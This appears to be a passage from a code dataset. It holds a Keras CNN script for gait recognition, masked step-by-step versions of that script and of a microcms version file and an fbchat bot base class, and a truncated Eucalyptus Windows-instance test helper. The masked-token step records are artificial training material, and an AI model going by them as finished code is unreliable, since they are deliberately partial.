verbose=1, validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss : ', score[0])
print('Test Accuracy : ', score[1])
<|reserved_special_token_1|>
import sys
import os
import tensorflow as tf
import keras
from cv2 import *
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from PIL import Image
import numpy as np
import pickle
from sklearn.model_selection import train_test_split
from keras.utils import np_utils
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten
from keras.callbacks import ModelCheckpoint, EarlyStopping
np.random.seed(7)
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.8
tf.keras.backend.set_session(tf.Session(config=config))
np.set_printoptions(threshold=np.nan)
x_train = []
y_train = []
x_test = []
y_test = []
path = './200305_gei'
list = os.listdir(path)
i = 0
with open('gei.txt', 'rb') as fr:
x_train = pickle.load(fr)
y_train = pickle.load(fr)
print('pickle successfully read')
x_train, x_test, y_train, y_test = train_test_split(x_train, y_train,test_size=0.2)
input_shape = (128, 96, 1)
batch_size = 128
num_classes = 128
epochs = 100
x_train = np.array(x_train)
x_test = np.array(x_test)
y_train = np.array(y_train)
y_test = np.array(y_test)
x_train = np.expand_dims(x_train, axis=3)
x_test = np.expand_dims(x_test, axis=3)
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, kernel_size=(5,5), strides=(1,1), padding='same', activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2,2), strides=(2,2)))
model.add(Conv2D(64, kernel_size=(2,2), strides=(1,1), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
history = model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print("Test loss : ", score[0])
print("Test Accuracy : ", score[1])
|
flexible
|
{
"blob_id": "0681ab83843187701ac72018b6078f5141bf22e0",
"index": 3663,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nnp.random.seed(7)\n<mask token>\ntf.keras.backend.set_session(tf.Session(config=config))\nnp.set_printoptions(threshold=np.nan)\n<mask token>\nwith open('gei.txt', 'rb') as fr:\n x_train = pickle.load(fr)\n y_train = pickle.load(fr)\nprint('pickle successfully read')\n<mask token>\nmodel.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',\n activation='relu', input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',\n activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(1000, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.summary()\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[\n 'accuracy'])\n<mask token>\nprint('Test loss : ', score[0])\nprint('Test Accuracy : ', score[1])\n",
"step-3": "<mask token>\nnp.random.seed(7)\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.8\ntf.keras.backend.set_session(tf.Session(config=config))\nnp.set_printoptions(threshold=np.nan)\nx_train = []\ny_train = []\nx_test = []\ny_test = []\npath = './200305_gei'\nlist = os.listdir(path)\ni = 0\nwith open('gei.txt', 'rb') as fr:\n x_train = pickle.load(fr)\n y_train = pickle.load(fr)\nprint('pickle successfully read')\nx_train, x_test, y_train, y_test = train_test_split(x_train, y_train,\n test_size=0.2)\ninput_shape = 128, 96, 1\nbatch_size = 128\nnum_classes = 128\nepochs = 100\nx_train = np.array(x_train)\nx_test = np.array(x_test)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\nx_train = np.expand_dims(x_train, axis=3)\nx_test = np.expand_dims(x_test, axis=3)\nx_train = x_train.astype('float32') / 255\nx_test = x_test.astype('float32') / 255\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',\n activation='relu', input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',\n activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(1000, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.summary()\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[\n 'accuracy'])\nhistory = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs,\n verbose=1, validation_data=(x_test, y_test))\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss : ', score[0])\nprint('Test Accuracy : ', score[1])\n",
"step-4": "import sys\nimport os\nimport tensorflow as tf\nimport keras\nfrom cv2 import *\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom PIL import Image\nimport numpy as np\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils import np_utils\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nnp.random.seed(7)\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.8\ntf.keras.backend.set_session(tf.Session(config=config))\nnp.set_printoptions(threshold=np.nan)\nx_train = []\ny_train = []\nx_test = []\ny_test = []\npath = './200305_gei'\nlist = os.listdir(path)\ni = 0\nwith open('gei.txt', 'rb') as fr:\n x_train = pickle.load(fr)\n y_train = pickle.load(fr)\nprint('pickle successfully read')\nx_train, x_test, y_train, y_test = train_test_split(x_train, y_train,\n test_size=0.2)\ninput_shape = 128, 96, 1\nbatch_size = 128\nnum_classes = 128\nepochs = 100\nx_train = np.array(x_train)\nx_test = np.array(x_test)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\nx_train = np.expand_dims(x_train, axis=3)\nx_test = np.expand_dims(x_test, axis=3)\nx_train = x_train.astype('float32') / 255\nx_test = x_test.astype('float32') / 255\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(5, 5), strides=(1, 1), padding='same',\n activation='relu', input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(2, 2), strides=(1, 1), padding='same',\n activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(1000, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.summary()\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[\n 'accuracy'])\nhistory = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs,\n verbose=1, validation_data=(x_test, y_test))\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss : ', score[0])\nprint('Test Accuracy : ', score[1])\n",
"step-5": "import sys\nimport os\nimport tensorflow as tf\nimport keras\nfrom cv2 import *\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom PIL import Image\nimport numpy as np\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils import np_utils\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\nnp.random.seed(7)\n\nconfig = tf.ConfigProto()\n\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.8\n\ntf.keras.backend.set_session(tf.Session(config=config))\n\nnp.set_printoptions(threshold=np.nan)\nx_train = []\ny_train = []\nx_test = []\ny_test = []\n\npath = './200305_gei'\nlist = os.listdir(path)\ni = 0\n\n\nwith open('gei.txt', 'rb') as fr:\n x_train = pickle.load(fr)\n y_train = pickle.load(fr)\nprint('pickle successfully read')\n\n\n\nx_train, x_test, y_train, y_test = train_test_split(x_train, y_train,test_size=0.2)\n\ninput_shape = (128, 96, 1)\n\nbatch_size = 128\nnum_classes = 128\nepochs = 100\n\nx_train = np.array(x_train)\nx_test = np.array(x_test)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\n\nx_train = np.expand_dims(x_train, axis=3)\nx_test = np.expand_dims(x_test, axis=3)\n\nx_train = x_train.astype('float32') / 255\nx_test = x_test.astype('float32') / 255\n\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(5,5), strides=(1,1), padding='same', activation='relu', input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2,2), strides=(2,2)))\nmodel.add(Conv2D(64, kernel_size=(2,2), strides=(1,1), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(1000, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.summary()\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(x_test, y_test))\n\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint(\"Test loss : \", score[0])\nprint(\"Test Accuracy : \", score[1])\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""microcms package, minimalistic flatpage enhancement.
THIS SOFTWARE IS UNDER BSD LICENSE.
Copyright (c) 2010-2012 Daniele Tricoli <[email protected]>
Read LICENSE for more informations.
"""
VERSION = (0, 2, 0)
|
normal
|
{
"blob_id": "3e1c2d0c5bb30d093a99f10020af14db5436bf02",
"index": 5551,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nVERSION = 0, 2, 0\n",
"step-3": "# -*- coding: utf-8 -*-\n\"\"\"microcms package, minimalistic flatpage enhancement.\n\nTHIS SOFTWARE IS UNDER BSD LICENSE.\nCopyright (c) 2010-2012 Daniele Tricoli <[email protected]>\n\nRead LICENSE for more informations.\n\"\"\"\nVERSION = (0, 2, 0)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from fbchat import Client
class IBehaviourBase(Client):
BreakFlag = False
def __init__(self,email,password, kwargs):
""""abstract class being parent of every user implemented behaviour;
it handles logging in and tasks on behaviour loader side"""
self.kwargs=kwargs
Client.__init__(self, email=email, password=password)
self.Run()
def Run(self):
print("behaviour base abstract method invoked error")
## todo add exception here
|
normal
|
{
"blob_id": "e67f27eec53901f27ba5a7ee7e2a20bbb1e8f7f9",
"index": 2237,
"step-1": "<mask token>\n\n\nclass IBehaviourBase(Client):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass IBehaviourBase(Client):\n <mask token>\n\n def __init__(self, email, password, kwargs):\n \"\"\"\"abstract class being parent of every user implemented behaviour;\n it handles logging in and tasks on behaviour loader side\"\"\"\n self.kwargs = kwargs\n Client.__init__(self, email=email, password=password)\n self.Run()\n\n def Run(self):\n print('behaviour base abstract method invoked error')\n",
"step-3": "<mask token>\n\n\nclass IBehaviourBase(Client):\n BreakFlag = False\n\n def __init__(self, email, password, kwargs):\n \"\"\"\"abstract class being parent of every user implemented behaviour;\n it handles logging in and tasks on behaviour loader side\"\"\"\n self.kwargs = kwargs\n Client.__init__(self, email=email, password=password)\n self.Run()\n\n def Run(self):\n print('behaviour base abstract method invoked error')\n",
"step-4": "from fbchat import Client\n\n\nclass IBehaviourBase(Client):\n BreakFlag = False\n\n def __init__(self, email, password, kwargs):\n \"\"\"\"abstract class being parent of every user implemented behaviour;\n it handles logging in and tasks on behaviour loader side\"\"\"\n self.kwargs = kwargs\n Client.__init__(self, email=email, password=password)\n self.Run()\n\n def Run(self):\n print('behaviour base abstract method invoked error')\n",
"step-5": "from fbchat import Client\nclass IBehaviourBase(Client):\n BreakFlag = False\n def __init__(self,email,password, kwargs):\n \"\"\"\"abstract class being parent of every user implemented behaviour;\n it handles logging in and tasks on behaviour loader side\"\"\"\n self.kwargs=kwargs\n Client.__init__(self, email=email, password=password)\n\n self.Run()\n\n def Run(self):\n print(\"behaviour base abstract method invoked error\")\n ## todo add exception here\n\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# Software License Agreement (BSD License)
#
# Copyright (c) 2009-2011, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Redistribution and use of this software in source and binary forms, with or
# without modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above
# copyright notice, this list of conditions and the
# following disclaimer.
#
# Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: [email protected]
'''
@author: clarkmatthew
Extension of the boto instance class, with added convenience methods and objects.
Adds common Windows instance test routines to this class.
Examples:
from eucaops import Eucaops
from nephoria.windows_instance import WinInstance
tester = Eucaops(credpath='eucarc-10.111.5.80-eucalyptus-sys_admin')
wins = WinInstance.make_euinstance_from_instance(tester.get_instances(idstring='i-89E13DA8')[0], tester=tester, keypair='test')
vol = tester.get_volume(status='available', zone=wins.placement)
wins.attach_volume(vol)
'''
import socket
import os
import re
import time
import copy
import types
import operator
from prettytable import PrettyTable, ALL
from boto.ec2.instance import Instance
from nephoria.aws.ec2.euvolume import EuVolume
from cloud_utils.log_utils import eulogger, get_line, markup
from nephoria.euca.taggedresource import TaggedResource
from boto.ec2.instance import InstanceState
from datetime import datetime
from cloud_utils.net_utils import winrm_connection
termline = get_line()
class WinInstanceDiskType():
gigabyte = 1073741824
megabyte = 1048576
def __init__(self, win_instance, wmic_dict):
self.check_dict_requires(wmic_dict)
self.__dict__ = self.convert_numbers_in_dict(copy.copy(wmic_dict))
self.win_instance = win_instance
self.size_in_gb = self.get_size_in_gb()
self.size_in_mb = self.get_size_in_mb()
self.size = long(self.size or 0)
self.last_updated = time.time()
self.setup()
def setup(self):
raise Exception('Not Implemented')
def check_dict_requires(self, wmic_dict):
raise Exception('Not Implemented')
def convert_numbers_in_dict(self, dict):
#convert strings representing numbers to ints
for key in dict:
value = str(dict[key])
if (re.search("\S", str(dict[key])) and not re.search("\D", str(dict[key]))):
dict[key] = long(dict[key])
return dict
def get_partition_ids(self):
retlist = []
for part in self.disk_partitions:
retlist.append(part.deviceid)
return retlist
def get_logicaldisk_ids(self):
retlist = []
for part in self.disk_partitions:
retlist.extend(part.get_logicaldisk_ids())
return retlist
def get_size_in_gb(self):
'''
        Attempts to convert self.size from bytes to gigabytes, rounding up when the remainder
        is > .99 of a gigabyte to account for differences in how the size is represented
'''
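        # For instance, a drive reporting 10736369664 bytes (1 MiB short of 10 GiB) still
        # rounds up to size_in_gb == 10, since the remainder is > .99 of a gigabyte.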
self.size = int(self.size or 0)
gigs = self.size / self.gigabyte
if (self.size % self.gigabyte) /float(self.gigabyte) > .99:
gigs += 1
return gigs
def get_size_in_mb(self):
'''
        Attempts to convert self.size from bytes to megabytes, rounding up when the remainder
        is > .99 of a megabyte to account for differences in how the size is represented
'''
self.size = int(self.size or 0)
mb = self.size / self.megabyte
if (self.size % self.megabyte) /float(self.megabyte) > .99:
mb += 1
return mb
def print_self(self):
self.get_summary(printmethod=self.win_instance.debug)
def get_summary(self, printheader=True, printmethod=None):
raise Exception('Method not implemented')
def print_self_full(self, printmethod=None):
'''
formats and prints self.dict
'''
self.win_instance.print_dict(dict=self.__dict__, printmethod=printmethod)
class WinInstanceDiskDrive(WinInstanceDiskType):
def setup(self):
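        # Fill in any wmic fields that may be missing (serialnumber, caption), keep caption
        # and model in sync, then map this drive to its cygwin SCSI device and EBS volume info.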
if not hasattr(self, 'serialnumber'):
self.serialnumber = ''
if not hasattr(self, 'caption'):
self.caption = ''
if hasattr(self, 'model'):
self.caption = self.model
else:
self.model = self.caption
self.cygwin_scsi_drive = self.win_instance.get_cygwin_scsi_dev_for_windows_drive(windisk=self)
self.update_ebs_info()
self.disk_partitions = []
def check_dict_requires(self, wmic_dict):
if not ('deviceid' in wmic_dict and
'size' in wmic_dict and
                ('caption' in wmic_dict or 'model' in wmic_dict) and
'index' in wmic_dict):
raise Exception('wmic_dict passed does not contain needed attributes; deviceid, size, caption, and index')
def get_partition_ids(self):
retlist = []
for part in self.disk_partitions:
retlist.append(part.deviceid)
return retlist
def get_logicaldisk_ids(self):
retlist = []
for part in self.disk_partitions:
retlist.extend(part.get_logicaldisk_ids())
return retlist
def update_md5_info_from_ebs(self):
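        # Find the attached EBS volume whose guest device matches this drive, compute its md5
        # (over the first md5len bytes via the cygwin device) if not already cached, and copy
        # the checksum info onto this drive.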
self.md5 = None
self.md5len = None
for vol in self.win_instance.attached_vols:
if vol.guestdev == self.deviceid:
if not vol.md5:
vol.md5len = 1024
vol.md5 = self.win_instance.get_dev_md5(self.cygwin_scsi_drive, vol.md5len)
self.md5 = vol.md5
self.md5len = vol.md5len
break
def update_ebs_info_from_serial_number(self):
'''
Attempts to parse the serial number field from an EBS volume and find the correlating ebs volume
example format: vol-81C13EA4-dev-sdg
'''
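        # e.g. 'vol-81C13EA4-dev-sdg' yields ebs_volume='vol-81C13EA4' and ebs_cloud_dev='/dev/sdg'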
if re.match("^vol-", self.serialnumber):
split = self.serialnumber.split('-')
self.ebs_volume = str(split[0]) + "-" + str(split[1])
self.ebs_cloud_dev = "/" + str(split[2]) + "/" + str(split[3])
else:
self.ebs_volume = ''
self.ebs_cloud_dev = ''
def update_ebs_info(self):
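        # Resolve which EBS volume backs this drive: first from the serial number, then from
        # the root block device mapping (boot disk of EBS-backed instances) or the attached
        # volume list, and finally fill in the cloud device name and md5 info.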
self.update_ebs_info_from_serial_number()
if not self.ebs_volume:
if self.index == 0 and self.win_instance.root_device_type == 'ebs':
bdm = self.win_instance.block_device_mapping[self.win_instance.root_device_name]
self.ebs_volume = bdm.volume_id
else:
for vol in self.win_instance.attached_vols:
if vol.guestdev == self.deviceid:
self.ebs_volume = vol.id
break
if not self.ebs_cloud_dev and self.ebs_volume:
volume = self.win_instance.tester.get_volume(volume_id=self.ebs_volume)
if hasattr(volume,'attach_data') and volume.attach_data:
self.ebs_cloud_dev = volume.attach_data.device
self.update_md5_info_from_ebs()
def get_summary(self, printheader=True, printmethod=None):
buf = ""
deviceid = 20
size = 16
sizegb = 7
ebsvol = 12
serialnumber = 24
caption = 36
part_count = 6
logical_ids = 8
cygdrive = 10
md5 = 32
header = "DISKDRIVE DEV ID".center(deviceid) + "|" + \
"SIZE B".center(size) + "|" + \
"SIZE GB".center(sizegb) + "|" + \
"EBS VOL".center(ebsvol) + "|" + \
"CAPTION".center(caption) + "|" + \
"PARTS".center(part_count) + "|" + \
"LOGICAL".center(logical_ids) + "|" + \
"CYGDRIVE".center(cygdrive) + "|" + \
"SERIAL NUMBER".center(serialnumber) + "|" + \
"MD5 CHECK SUM".center(md5) + "|"
summary = str(self.deviceid).center(deviceid) + "|" + \
str(self.size).center(size) + "|" + \
str(self.size_in_gb).center(sizegb) + "|" + \
str(self.ebs_volume).center(ebsvol) + "|" + \
str(self.caption).center(caption) + "|" + \
str(self.partitions).center(part_count) + "|" + \
str(",".join(str(x) for x in self.get_logicaldisk_ids())).center(logical_ids) + "|" + \
str(self.cygwin_scsi_drive).center(cygdrive) + "|" + \
str(self.serialnumber).center(serialnumber) + "|" + \
str(self.md5).center(md5) + "|"
length = len(header)
if len(summary) > length:
length = len(summary)
line = get_line(length)
if printheader:
buf += line + header + line
buf += summary + line
if printmethod:
printmethod(buf)
return buf
class WinInstanceDiskPartition(WinInstanceDiskType):
def setup(self):
#self.cygwin_scsi_drive = self.win_instance.get_cygwin_scsi_dev_for_windows_drive(drive_id=self.deviceid)
self.logicaldisks = []
#Set values in case 'brief' was used when fetching partitions
if not hasattr(self,'deviceid'):
self.deviceid = self.name
if not hasattr(self,'bootable'):
self.bootable = self.bootpartition
if not hasattr(self,'diskindex'):
self.diskindex = self.get_disk_index_from_name()
def check_dict_requires(self, wmic_dict):
if not ('name' in wmic_dict and
'size' in wmic_dict and
'bootpartition' in wmic_dict and
'index' in wmic_dict):
raise Exception('wmic_dict passed does not contain needed attributes; deviceid, size, index and bootable')
def get_disk_index_from_name(self):
diskindex = None
diskindexstring = self.name.split(',')[0]
if re.search('disk', diskindexstring, re.IGNORECASE):
diskindex = int(diskindexstring.split('#')[1])
return diskindex
def get_logicaldisk_ids(self):
retlist = []
for disk in self.logicaldisks:
retlist.append(disk.deviceid)
return retlist
def get_summary(self, printheader=True, printmethod=None):
buf = ""
deviceid = 24
size = 16
sizegb = 12
sizemb = 12
bootable = 10
header = "PARTITION DEV ID".center(deviceid) + "|" + \
"SIZE B".center(size) + "|" + \
"SIZE GB".center(sizegb) + "|" + \
"SIZE MB".center(sizemb) + "|" + \
"BOOTABLE".center(bootable) + "|"
summary = str(self.deviceid).center(deviceid) + "|" + \
str(self.size).center(size) + "|" + \
str(self.size_in_gb).center(sizegb) + "|" + \
str(self.size_in_mb).center(sizemb) + "|" + \
str(self.bootable).center(bootable) + "|"
length = len(header)
if len(summary) > length:
length = len(summary)
line = get_line(length)
if printheader:
buf += line + header + line
buf += summary + line
if printmethod:
printmethod(buf)
return buf
class WinInstanceLogicalDisk(WinInstanceDiskType):
def setup(self):
self.cygwin_scsi_drive = self.win_instance.get_cygwin_scsi_dev_for_windows_drive(windisk=self)
self.partition = None
def check_dict_requires(self, wmic_dict):
if not ('deviceid' in wmic_dict and
'size' in wmic_dict and
'description' in wmic_dict and
'freespace' in wmic_dict and
'filesystem' in wmic_dict):
raise Exception('wmic_dict passed does not contain needed attributes; deviceid, size, description, freespace and filesystem')
def get_summary(self, printheader=True, printmethod=None):
buf = ""
deviceid = 24
size = 16
freespace = 16
filesystem = 24
description = 30
cygdrive = 10
header = "LOGICAL DEV ID".center(deviceid) + "|" + \
"SIZE".center(size) + "|" + \
"FREE SPACE".center(freespace) + "|" + \
"FILE SYSTEM".center(filesystem) + "|" + \
"DESCRIPTION".center(description) + "|" + \
"CYGDRIVE".center(cygdrive) + "|"
summary = str(self.deviceid).center(deviceid) + "|" + \
str(self.size).center(size) + "|" + \
str(self.freespace).center(freespace) + "|" + \
str(self.filesystem).center(filesystem) + "|" + \
str(self.description).center(description) + "|" + \
str(self.cygwin_scsi_drive).center(cygdrive) + "|"
length = len(header)
if len(summary) > length:
length = len(summary)
line = get_line(length)
if printheader:
buf += line + header + line
buf += summary + line
if printmethod:
printmethod(buf)
return buf
class WinInstance(Instance, TaggedResource):
gigabyte = 1073741824
megabyte = 1048576
@classmethod
def make_euinstance_from_instance(cls,
instance,
tester,
debugmethod = None,
keypair=None,
keypath=None,
password=None,
username="Administrator",
auto_connect = True,
verbose=True,
timeout=120,
private_addressing = False,
reservation = None,
cmdstart=None,
try_non_root_exec=True,
winrm_port='5985',
winrm_protocol='http',
rdp_port='3389',
rootfs_device = "sda",
block_device_prefix = "sd",
bdm_root_vol = None,
virtio_blk = True,
cygwin_path = None,
disk_update_interval=10,
retry=2,
brief=False
):
'''
Primary constructor for this class. Note: to avoid opening a remote session within this method, provide keys/username/password later.
Arguments:
instance - mandatory- a Boto instance object used to build this euinstance object
keypair - optional- a boto keypair object used to retrieve/decrypt the Windows password for the remote (winrm) connection
username - optional- string used to create the remote connection as an alternative to keypair
password - optional- string used to create the remote connection to this instance as an alternative to keypair
auto_connect -optional -boolean, if True will attempt to automatically create a remote (winrm) session for this instance
try_non_root_exec -optional -boolean, if True will attempt to use sudo if available else su -c to execute privileged commands
timeout - optional- integer used for the remote connection timeout
debugmethod - optional - method, used for debug output
verbose - optional - boolean to determine if debug is to be printed using debug()
retry - optional - integer, connection attempts for non-authentication failures
'''
newins = WinInstance(instance.connection)
newins.__dict__ = instance.__dict__
newins.tester = tester
newins.winrm_port = winrm_port
newins.rdp_port = rdp_port
newins.bdm_root_vol = None
newins.winrm_protocol = winrm_protocol
newins.debugmethod = debugmethod
if newins.debugmethod is None:
newins.log = eulogger.Eulogger(identifier= str(instance.id))
newins.debugmethod= newins.log.debug
if (keypair is not None):
if isinstance(keypair,types.StringTypes):
keyname = keypair
keypair = tester.get_keypair(keyname)
else:
keyname = keypair.name
newins.keypath = keypath or os.getcwd() + "/" + keyname + ".pem"
newins.keypair = keypair
newins.password = password
newins.username = username
newins.verbose = verbose
newins.attached_vols=[]
newins.timeout = timeout
newins.virtio_blk = virtio_blk
newins.disk_update_interval = disk_update_interval
newins.retry = retry
newins.brief = brief
newins.rootfs_device = rootfs_device
newins.block_device_prefix = block_device_prefix
newins.private_addressing = private_addressing
newins.reservation = reservation or newins.get_reservation()
if newins.reservation:
newins.security_groups = newins.tester.get_instance_security_groups(newins)
else:
newins.security_groups = None
newins.laststate = newins.state
newins.cmdstart = cmdstart
newins.auto_connect = auto_connect
newins.set_last_status()
newins.update_vm_type_info()
newins.cygwin_path = cygwin_path
newins.system_info = None
newins.diskdrives = []
newins.disk_partitions = []
newins.logicaldisks = []
newins.cygwin_dev_map = {}
#newins.set_block_device_prefix()
if newins.root_device_type == 'ebs':
try:
volume = newins.tester.get_volume(volume_id = newins.block_device_mapping.get(newins.root_device_name).volume_id)
newins.bdm_root_vol = EuVolume.make_euvol_from_vol(volume, tester=newins.tester,cmdstart=newins.cmdstart)
except:pass
newins.winrm = None
if newins.auto_connect and newins.state == 'running':
newins.connect_to_instance(timeout=timeout)
return newins
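# A minimal usage sketch (assumes an existing boto 'instance' object and a tester/eucaops
# connection named 'tester'; the keypair name 'mykey' is only a placeholder):
#   win = WinInstance.make_euinstance_from_instance(instance, tester,
#                                                   keypair=tester.get_keypair('mykey'),
#                                                   auto_connect=True)
#   win.sys('ver', code=0)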
@property
def age(self):
launchtime = self.tester.get_datetime_from_resource_string(self.launch_time)
# return the elapsed time in seconds
return (time.mktime(datetime.utcnow().utctimetuple()) -
time.mktime(launchtime.utctimetuple()))
def update(self, validate=False, dry_run=False,
err_state='terminated', err_code=-1):
ret = None
tb = ""
retries = 2
for x in xrange(0, retries):
try:
#send with validation True, fail later...
ret = super(WinInstance, self).update(validate=True,
dry_run=dry_run)
break
except ValueError:
if validate:
raise
tb = self.tester.get_traceback()
self.debug('Failed to update instance. Attempt:{0}/{1}'
.format(x + 1, retries))
if not ret:
failmsg = 'Failed to update instance. Instance may no longer ' \
'be present on system: "{0}"'.format(self.id)
self.debug('{0}\n{1}'.format(tb, failmsg))
self.debug('{0} setting fake state to:"{1}"'.format(self.id,
err_state))
state = InstanceState(name=err_state, code=err_code)
self._state = state
ret = self.state
self.set_last_status()
return ret
def update_vm_type_info(self):
self.vmtype_info = self.tester.get_vm_type_from_zone(self.placement,self.instance_type)
return self.vmtype_info
def set_last_status(self,status=None):
self.laststate = self.state
self.laststatetime = time.time()
self.age_at_state = self.tester.get_instance_time_launched(self)
#Also record age from user's perspective, ie when they issued the run instance request (if this is available)
if self.cmdstart:
self.age_from_run_cmd = "{0:.2f}".format(time.time() - self.cmdstart)
else:
self.age_from_run_cmd = None
def print_dict(self, dict=None, printmethod=None):
'''
formats and prints
'''
printmethod = printmethod or self.debug
buf = "\n"
dict = dict or self.__dict__
longest_key = 0
for key in dict:
if len(key) > longest_key:
longest_key = len(key)
for key in dict:
buf += str(key).ljust(longest_key) + " -----> :" + str(dict[key]) + "\n"
printmethod(buf)
def printself(self, title=True, footer=True, printmethod=None, printme=True):
def state_markup(state):
# Markup instance state...
if state == 'running':
return markup(state, markups=[1, 92])
if state == 'terminated':
return markup(state, markups=[1, 97])
if state == 'shutting-down':
return markup(state, markups=[1, 95])
if state == 'pending':
return markup(state, markups=[1, 93])
if state == 'stopped':
return markup(state, markups=[1, 91])
else:
return markup(state, markups=[1, 91])
def multi_line(lines):
# Utility method for creating multi line table entries...
buf = ""
maxlen = 0
for line in lines:
